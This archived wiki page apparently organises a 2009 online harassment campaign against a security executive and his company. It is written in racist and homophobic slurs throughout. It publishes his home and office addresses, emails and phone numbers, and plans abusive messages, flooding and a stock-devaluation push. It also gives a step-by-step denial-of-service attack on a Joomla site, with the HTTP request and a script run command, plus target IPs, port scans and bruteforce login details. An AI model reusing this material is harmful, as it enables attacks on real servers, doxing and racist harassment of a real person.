Operation Niggermatrix - malkovich/bibanon GitHub Wiki

Table of Contents

Details

no1hacker; he is [http://encyclopediadramatica.com/Noone no1], he hacks [http://encyclopediadramatica.com/Noone no1]

Greg is the owner of his own "company" LIGATT Security. He has been arrested for conspiracy and wire-fraud charges, a far cry from what Kevin Mitnick, a real hacker has been arrested for. He has been appearing on TV talking his bullshit, especially The History Channel, which will make anyone puke just by watching it. His entire company is a scam, so is his title as No. 1 Hacker, what's worse is that a black guy is an investor in LIGATT security, and we all know that niggers can't hack.

wait wat? The LIGATT Security Challenge (plain txt mirror):

The LIGATT Challenge is designed for individuals to prove their computer security expertise by challenging the self proclaimed “World’s No. 1 Hacker” Gregory Evans.
By entering this contest, entrants automatically agree to be bound by the terms of this contest.
Only one entry per person, per e-mail address will be considered for contest entry.
All contestants must be at least 18 years of age, unless otherwise stated or posted.
By entering a contest, you are conclusively deemed to have agreed to be bound by these contest rules and terms and conditions as well as by any rules specific to such contest. This is an irrevocable condition of entry.
... moar
tl;dr the nigger has a 100% rigged competition that basically says you loose automatically if you challenge him, the kicker: it costs you $195.00+. The full text is here (plain txt mirror), exploitable form: here (plain txt mirror). i can has scam much? Mirrors are for posterity, in case that nigs lawyers try any funny business if/when this shit gets srs.

Also:

  1. Press Releases (ligattsecurity.net) to dig through for lulz/fail, mirrored on many 'big name' sites.
  2. Information (ligattsecurity.net) about this niggers company, targeted at Jews.
  3. List of news story mirror sites (google.com)
  4. Discussions about LIGATT SECURITY INTL INC (google.com)
  5. Stock Information (google.com) about the niggers 'company'.
Using the current numbers (as of Oct. 24th 2009), LIGATT SECURITY INTL INC is worth $60 USD on the market. xD what a poor nigger, serves him right. $60 USD isn't much but we need his company to be worth nothing.>:D It should be noted that the niggers site claims a "Estimated Market Cap: $2,462,436 as of July 27, 2009", where in reality the market cap calculated to only $62,480, this is assuming my understanding of market cap, the stock information from Pink OTC Markets Inc. (c/o Google Finance) is correct, and that my computer's mathematic outputs are correct. This is still a large amount of money but it is not what their site is claiming, I find it interesting that they chose the date of July 27th. Why fabricate the numbers when only about a month earlier (June 29, 2009) their company had it's largest peak in share volume, 148 million shares! Which (at that time where worth $0.003 each) calculates to $444,000 USD, which is a much larger value then (~7.1x) the $62,480 market cap on June 27th. This peak in share volume may not have been the peak market cap of the company but it seems that way imo, since when the shares were at their highest cost ($0.006 each) on April 22, 2009 (when I assume the company started selling stock, that data starts there), the total market cap value was only $78,900 USD (about 5.6x less then the value at the time of the share volume peak).

Idk where the nigger got the number $2,462,436, esp. on the date provided. He's had a current max. of 148 million shares but at no time in recent history has any share cost above 6/10th of a cent ($0.006) each. This nigger is pulling numbers out of his ass.

tl;dr He has currently has 100k Shares @ $0.0006 (6/1000th cent) each. The nigs site claims his company was "Founded: 2003" though Google only has stock data starting mid-April 2009 (where his shares stated @ $0.006 (6/10th cent) each, over time the price per share has dropped to much less (you can look at the graphs yourself). It should be noted (imo) that the volume (number of shares in the market) of his stock peaked to ~148M shared near the end of June '09 @ $0.003 each. The volume has moved up and down over time, there was a smaller peak of 117.54M shares (@ $0.001 each) around early Oct. '09. Tomorrow he could have over 9000 or over 9M shares on the market, if a very flexiable number. I would preferif this nigger had a volume of zero shares, but since that's close to impossible to do (look at the way the markets work), I think it would be a obtainable goal to lower this nigger's share volume to 1k or less. Of course we should also be aware of the price of the stock, because 1k shares @ over $9000 is no good either. The best way to do this is to trash his company and reputation in every and all ways possible. =)

  • Other Interesting Information:
  1. "LIGATT Security Brands: SPOOFEM.COM, SpoofAbuse, LIGATT, Made Short & Simple, No 1 Hacker and Hacker For Hire" -- sause
    No 1 Hacker = No One Hacker. lol that almost as good as an hero. xD
    Made Short & Simple = this niggers penis and mind.
    Hacker For Hire = Hacking up all the womens meat.
    lulz can be had, esp. if their 'brands' become meme for this raid. heh
  2. Terms and Conditions (ligattsecurity.net), plain txt mirror
  3. Privacy Policy (ligattsecurity.net), plain txt mirror
  4. Refund Policy (ligattsecurity.net), plain txt mirror
^^^ Any legalfags wanna take a look at those, see if they are breaking any tax laws, privacy laws, or whatever?
Arrogant nigger is arrogant: "As a child I failed to receive the necessary mentoring and guidance that every adolescent should encompass; therefore the right outlet for my genius was unrecognizable." (sauce)

Raid Planning

  • Report all GPL, GNU software violations.
  • Mailraep
  • Get the word out
  • Bandwidth Raeping
  • 1 star all his YouTube ratings
  • Reduce share worth and share volume of LIGATT SECURITY INTL INC (LGTT) to the lowest amount possible.
  • Make multiple YouTube accounts and send offensive, horrible messages
  • Raep poll on his website homepage by voting No (Put this in iMacro and repeat 9000 times)
  • Leave nasty comments on his videos, since the nigger shut off his channel comments
  • E-mail raep
  • uber-h4x0ring :3
  • Leave racist, homophobic comments on his blog
  • Leave shit at his house (we have several known anons in the Moreno Valley area)
  • if site access is gained, put his own sites on Ligatt's scam watch
  • give his sites bad ratings with WebOfTrust

Violations of the GPL, GNU Licenses

  • Needed:
List of violations, sause of programs, sause of point-of-sale, ads, etc.
Letters (personal or form) to copyright holders, developers, software creators, etc. Make sure your srsly pissed about this nigger in your letters a simple 'oh hai thar I saw your software was being sold illegally' might not be good enough, better would be 'FFFFFFFFFFFFuuuuuuuuuuckkk I'm raging man! this nigger stole you shit and it's not cool sez sonic! You should sue that nigger, here's the proof [insert].' I'm paraphrasing of course but you get the idea (I hope).
  • How to report this nigger:
Who has the power to enforce the GPL?
What should I do if I discover a possible violation of the GPL?
Violations of the GNU Licenses

PASTA:
Who has the power to enforce the GPL?
Since the GPL is a copyright license, the copyright holders of the software are the ones who have the power to enforce the GPL. If you see a violation of the GPL, you should inform the developers of the GPL-covered software involved. They either are the copyright holders, or are connected with the copyright holders.

What should I do if I discover a possible violation of the GPL?
You should report it. First, check the facts as best you can. Then tell the publisher or copyright holder of the specific GPL-covered program. If that is the Free Software Foundation, write to <license-[email protected]></license-[email protected]>. Otherwise, the program's maintainer may be the copyright holder, or else could tell you how to contact the copyright holder, so report it to the maintainer.

Remember to talk pretty to the license holders, folks at GNU.org, and other importantfags. no chatspeak, rudeness, memes, or lulz. the law is srs bizness.

Dox

  • irl addresses:
6050 Peachtree Parkway.
Suite 240
Norcross, Ga 30092

11209 National Blvd.
Suite 178
Los Angeles, Ca 90064

1028 National Blvd.
Suite 426
Los Angeles, CA 90034

23758 CEDAR CREEK TERRACE
MORENO VALLEY, California 92557

13428 Maxella Ave, Suite 293,
Marina Del Rey, California 90292

  • email addresses:
  1. [email protected]
  2. [email protected]
  3. [email protected]
  4. [email protected]
  5. [email protected]
  6. [email protected]
  7. [email protected]
post moar addresses! :D
  • phone/fax:
  1. 866-354-4288 (phone)
  2. 866 3-LIGATT (^ same?)
  3. 866-420-4503 (fax) (Do I already hear you taping together pieces of paper?)
Both numbers use BLANK, I couldn't find the carrier with my normal raeper so I guess someone else will have to do it.

Getting the word out

Image and Video /b/ackup of the niggers youtube videos, images and any other useful data.
Create remixes, youtube poopz, trolling, lulz, etc.
/i/, /b/, youtube hater/troll videos, etc. list more shit plz.

  • Podcasts/RSS Feeds (for remixes. lulz)
  1. ligattsecurity.net/marketing/radioarchivesmall.rss - RSS Feed.
  2. ligattsecurity.net/marketing/radioarchive.rss - RSS Feed (with thumbnails)
  3. rssURLS.txt - Simple URL list of the mp3 files.
~~ YouTube ~~
~~ Vimeo ~~

See Dox for more online accounts, usernames, etc.

eXtreme SlowLoris

Although not traditional slowloris, a joomla exploit / anomaly allows for the crashing of the mysql server that powers just about everything...

Step 1) Open Socket(s)
Step 2) Send Headers:
POST /index.php?option&#61;com_user&amp;view&#61;reset&amp;layout&#61;confirm HTTP/1.1&lt;br /&gt; Host&#58; www.untraceableemail.net&lt;br /&gt; User&#45;Agent&#58; Mozilla/5.0 (Windows&#59; U&#59; Windows NT 6.1&#59; en&#45;US&#59; rv&#58;1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)&lt;br /&gt; Accept&#58; text/html,application/xhtml+xml,application/xml&#59;q&#61;0.9,&#42;/&#42;&#59;q&#61;0.8&lt;br /&gt; Accept&#45;Language&#58; en&#45;us,en&#59;q&#61;0.5&lt;br /&gt; Accept&#45;Encoding&#58; gzip,deflate&lt;br /&gt; Accept&#45;Charset&#58; ISO&#45;8859&#45;1,utf&#45;8&#59;q&#61;0.7,&#42;&#59;q&#61;0.7&lt;br /&gt; Connection&#58; keep&#45;alive&lt;br /&gt; Content&#45;Type&#58; application/x&#45;www&#45;form&#45;urlencoded&lt;br /&gt; Content&#45;Length&#58; 7&lt;br /&gt;&lt;br /&gt; token&#61;&#39;&lt;br /&gt; Step 3) Leave socket Open
Step 4) Repeat steps 1-3 a few thousand times.
Step 5) ...
Step 6) Profit!!! (http://img132.imageshack.us/img132/2548/screenshot1l.jpg)

php script by e http://p.defau.lt/?0j5qP32aKlvw3KSEZUdaaA
Run using php filename.php 1000 10 100 100 www.untraceableemail.net

Bandwidth Raeping

Large-ish files hosted on:

  • ligattsecurity.net:
  1. 1644k jpg file
  2. 722kb png file
  • spoofem.com (where super cool nigger hackers luv bitmap files, and useless memoirs):
  1. 13mb pdf file
  2. another 13mb pdf file
  3. 613k bmp file
  4. 573k bmp file
Post bigger files when if you find them and remember to remove the "http://anonym.to/?" prefix before you start reaping the URLs provided.
  • Google Image Searches:
  1. list1.txt - ligattsecurity.net; Complete List of Image File URLs extracted from Google Image Search (with amendments)
  2. spoofem.com (113 files)
  • Files Lists:
  1. list2.txt - spoofem.com; InComplete List of Image File URLs extracted from Google Image Search.
  • Podcasts/RSS Feeds (big files, also good for remixes)
  1. rssURLS.txt - Simple URL list of the mp3 files (downloading all the files in the list will use 122 MB [128,794,659] of bandwidth), sause: ligattsecurity.net/marketing/radioarchivesmall.rs.

uber-h4x0ring :3

  • IP Addresses / Targets:
  1. ligatt.com [64.202.189.170]
  2. spoofabuse.com [64.202.189.170] --> Redirects to spoofem.com [97.74.195.55]
  3. untracableemail.com [68.178.232.100]
  4. spoofem.net [72.167.183.50]
  5. spoofem.com [97.74.195.55]
  6. cybercrimedefensecard.com [97.74.195.56]
  7. ligattsecurity.net [208.109.166.175]
This nigger has too many websites. I wonder if they are all from the same GoDaddy account.
  • Webmail & Email!!!! =D
Webmail Login
Known Accounts:
  1. [email protected]
  2. [email protected]
  3. [email protected]
  4. [email protected]
  5. [email protected]
  6. [email protected]
  7. [email protected]
  8. [email protected]
  9. [email protected]
Manual Email (for bruteforcers and testing):
Incoming mail server (POP3)
POP, Pop.secureserver.net or IMAP, imap.secureserver.net.
Outgoing mail server (SMTP)
Smtpout.secureserver.net
GoDaddy seems to run all their inhouse email through secureserver.net.
It should be noted the URLs: webmail.ligatt.com, webmail.spoofabuse.com, webmail.untracableemail.com, webmail.spoofem.net, and webmail.ligattsecurity.net all point to https://email.secureserver.net with their respective domain names pre-entered into the page.
  • Port Scans
Scanned ports 1 through 1500 using OPScanner 2.0
  • ligatt.com ; open ports:
  1. 80 [http]
  • ligattsecurity.net ; open ports:
  1. 21 [ftp]
  2. 80 [http]
  3. 443 [https]
  • cybercrimedefensecard.com ; open ports;
  1. 21 [ftp]
  2. 22 [ssh]
  3. 53 [dns]
  4. 80 [http]
  5. 110 [pop3]
  6. 443 [https]
  7. 993 [imap4]
  8. 995 [pop3s]
  • spoofem.com ; //main site [scanned]ports 1 through 65535 using nmap
Discovered open ports:
  1. 21/tcp [ftp] on 97.74.195.55
  2. 22/tcp [ssh] on 97.74.195.55
  3. 25/tcp [smtp] on 97.74.195.55
  4. 53/tcp [dns] on 97.74.195.55
  5. 80/tcp [http] on 97.74.195.55
  6. 443/tcp [https] on 97.74.195.55
  • spoofem.net ; //contains some login scripts for .com [scanned]ports 1 through 65535 using nmap
Discovered open ports:
  1. 21/tcp [ftp] on 72.167.183.50
  2. 80/tcp [http] on 72.167.183.50
  3. 28836/tcp on 72.167.183.50
  4. 32003/tcp on 72.167.183.50
  5. 41436/tcp on 72.167.183.50
//what the fuck are these unregistered ports. possible attack vector? need udp scans too.
//web app fuzzing also a good idea, especially if these shitcunts wrote their own scripts.
-- The unregistered ports may be used by the SMS/Call spoofing services he claims to run, but that's just a wild guess on my part. Interesting ports are interesting.
  • Whois Records:
  1. ligatt.com :: SamSpade, Lookup Server, GoDaddy (registrar)
  2. ligattsecurity.net :: SamSpade, Lookup Server, GoDaddy (registrar)
  3. spoofem.com :: SamSpade, Lookup Server, GoDaddy (registrar)
  4. spoofem.net :: SamSpade, Lookup Server, GoDaddy (registrar)
  5. spoofabuse.com :: SamSpade, Lookup Server
  6. untracableemail.com :: SamSpade, Lookup Server
Interesting Shit:
Here's a report from acunetix: http://anonym.to/?http://rapidshare.com/files/300618174/ligattscan.pdf
Warning: require_once(/home/spoofemcom/public_html/administrator/components/com_rsfirewall/helpers/rsfirewall.php) [function.require-once]: failed to open stream: No such file or directory in /home/spoofemcom/public_html/plugins/system/rsfirewall.php on line 12
Fatal error: require_once() [function.require]: Failed opening required '/home/spoofemcom/public_html/administrator/components/com_rsfirewall/helpers/rsfirewall.php' (include_path='.:/usr/share/pear:/usr/share/php') in /home/spoofemcom/public_html/plugins/system/rsfirewall.php on line 12
Exploitable? Did someone break this site already? lol I hope so.
Site frontpage (index.php) seems to have returned to normal (no errors) @ ~3:20am (EDT); 10/23/2009.
Warning: require_once(/home/content/s/p/o/spoofem/html/includes/defines.php) [function.require-once]: failed to open stream: No such file or directory in /home/content/s/p/o/spoofem/html/index.php on line 25
Fatal error: require_once() [function.require]: Failed opening required '/home/content/s/p/o/spoofem/html/includes/defines.php' (include_path='.:/usr/local/php5/lib/php') in /home/content/s/p/o/spoofem/html/index.php on line 25
<iframe src="http://www.stocktrader.org.uk/remote/index.php?wt=10000000000000000&amp;h=250&amp;w=200&amp;bgc=f8fbf8&amp;tf=arial&amp;tfs=&amp;tc=688b9f&amp;tbc=688b9f&amp;f=arial&amp;fc=000000&amp;fs=10&amp;tz=-5&amp;cw=spof.pk" marginheight="0" marginwidth="0" scrolling="no" width="200" frameborder="0" height="220"></iframe>
Observed a strange flicker in the webpage index.php (rendered in Opera v10), investigated because it was kind of annoying, discovered IFRAME. Exploited if we can take over the iframe or dns to stocktrader.org.uk (unlikely) but if we find a sploit on the stock trader site it could be useful. Spoofem.com's PHP is def. not written by a hacker (or by machine), it's written by a nigger. Just look at the source code, you can tell. Even noticed some oily KFC fingerprints from the faggot in that PHP, like: , , and more faggotry close tags without any open tags that have been marked out instead of deleted. @_@
  • Bot Friendly Pages:
  1. ligattsecurity.net/index.php?option=com_registration&task=register - Registration Page (for flooding)
  2. ligattsecurity.net/index.php?option=com_login&Itemid=88888888 - Login Page (for testing, flooding, trolling, etc.)
    (leave other forms blank, enter captcha, click submit, ????, PROFIT!)
  3. ligattsecurity.net/index.php?option=com_content&task=view&id=316&Itemid=81 - Username/Password Post action to the PHP, looks like fun. Also a more blank forms on the page with no captchas.
  4. ligattsecurity.net/index.php?option=com_forme&Itemid=81&fid=11 - Contact Us page with form, no captcha, good for flooding trolling, etc.
  • w3 Markup Validation Service Outputs (real h4x0rs write webpages in pure binary, don't need HTML standards @_@... I'm kidding this nigger is a such a faggot, he even uses Joomla, I fucking hate Joomla. More on that later, scroll down).
  1. Checked: spoofem.com/index.php | Result: 68 Errors, 45 warning(s)
  2. Checked: ligattsecurity.net/index.php | Result: 118 Errors, 50 warning(s)
  • possible mail/proxy exploit on ligattsecurity
  1. http://anonym.to/?http://pastebay.com/63313
  • Joomla (is a piece of shit, very exploitable.)
  1. From cybercrimedefensecard.com/index.php, line 10;
    <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
  2. From spoofem.com/index.php (lines 6,7,8);
    <meta name="keywords" content="joomla, Joomla" />
    <meta name="description" content="Joomla! - the dynamic portal engine and content management system" />
    <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
  3. From ligattsecurity.net/index.php (various lines);

  4. From spoofem.net/joomla/index.php (various lines);
    <meta name="Generator" content="JoomSEO by Phill Brown (http://www.joomseo.com)." />
    <meta name="Generator" content="Joomla! - Copyright (C) 2005 - 2007 Open Source Matters. All rights reserved." />
  • It appears that on spoofem.com the index.php page may be xss vunerable (sause plz =D?)
  1. sause = acunetix vulnerability scanner
  • Double PHP! yay! :P Twice the fun, twice the 'sploits.
ligattsecurity.net ;;
  1. index.php
  2. index2.php
spoofem.com ;;
  1. index.php
  2. index2.php
spoofem.net ;;
  1. index.php
  2. index2.php
Joomla (1.5) logins
  1. Spoofem
  2. Cybercrimedefensecard

Moar Dox

Finances and BS article releases:

Names/addresses/emails:

from contact page on ligatt.com:
Amanda Duggan/Ebony Simpson
LIGATT Security International
11209 National Blvd.
Suite 178
Los Angeles, Ca 90064
[email protected]
866-354-4288 (phone)
866-420-4503 (fax)

from whois for bullymenomore.org:

GREGORY EVANS
LIGATT Investment Group
1028 National Blvd.
Suite 426
Los Angeles, CA 90034

from whois for ligatt.com:
EVANS, GREGORY [email protected]
LIGATT CORP
23758 CEDAR CREEK TERRACE
MORENO VALLEY, California 92557
United States
9095369216
(Above is from 2003 and may be GOLDEN)

from whois for ligattsecurity.com:

Registrant:
LIGATT Investment Group, 13428 Maxella Ave, Suite 293, Marina Del Rey, California 90292, United States Registered through: GoDaddy.com, Inc.
Administrative Contact: EVANS, GREGORY [email protected], LIGATT Investment Group,13428 Maxella Ave, Suite 293, Marina Del Rey, California 90292, United States, (866) 354-4288

other misc email addresses:

[email protected]
[email protected]

Various recon points:
~~ Twitter ~~

~~ Facebook ~~
Both Facebooks need wallreaps, among other lulz.
~~ MySpace ~~
~~ YouTube ~~
~~ Vimeo ~~
~~ Misc. ~~
company websites:

To Do

  1. Think about what 'To Do'
  2. Make a plan
  3. Edit the wiki page

Victories

Shooped Nigger Poll raep, Anon DO NOT WANT Haxor Category:Good New Raids
Add a custom footer
⚠️ **GitHub.com Fallback** ⚠️